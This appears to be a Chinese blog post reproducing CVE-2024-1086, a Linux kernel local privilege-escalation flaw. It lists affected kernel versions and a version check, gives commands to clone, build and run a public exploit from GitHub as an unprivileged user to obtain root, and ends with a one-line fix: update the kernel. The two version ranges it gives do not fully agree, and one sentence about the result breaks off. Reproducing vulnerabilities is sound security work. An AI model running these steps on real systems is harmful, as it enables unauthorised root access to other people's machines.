【漏洞复现】(CVE-2024-1086)Linux内核中提权漏洞CVE-2024-1086

小生迷途知返 2024-08-21 17:37:01 阅读 90

## 影响范围

以下版本的Linux内核受该漏洞影响:

- 3.15 <= Linux kernel < 6.1.76

- 5.2 <= Linux kernel < 6.6.15

- 6.7 <= Linux kernel < 6.7.3

- 6.8:rc1 = Linux kernel

该漏洞不适用于内核配置 `CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y` 且 Linux 内核版本 > 6.4 的系统。

## 检查是否受漏洞影响

### 1. 检查当前Linux内核版本

在终端运行以下命令,查看当前内核版本:

uname -a

该漏洞影响了使用Linux内核版本v5.14 - v6.6 版本(不包括分支修补版本 v5.15.149、v6.1.76和v6.6.15)的大多数 Linux系统/内核,包括CentOS、Debian、Ubuntu和 KernelCTF等

基本上2023前或者2023的都存在

漏洞利用

切换成普通用户一步步来就可以

su 用户名字

<code>#拉取项目并编译

git clone https://github.com/Notselwyn/CVE-2024-1086

cd CVE-2024-1086

make

#然后运行

./exploit

make不一定要全部成功只要生成exploit就可以

我这里下载好了

直接执行就可以了

./exploit

可以看到执行id命令后

漏洞修复

更新Linux内核

根据不同的Linux发行版,采取相应的内核更新步骤。



声明

本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。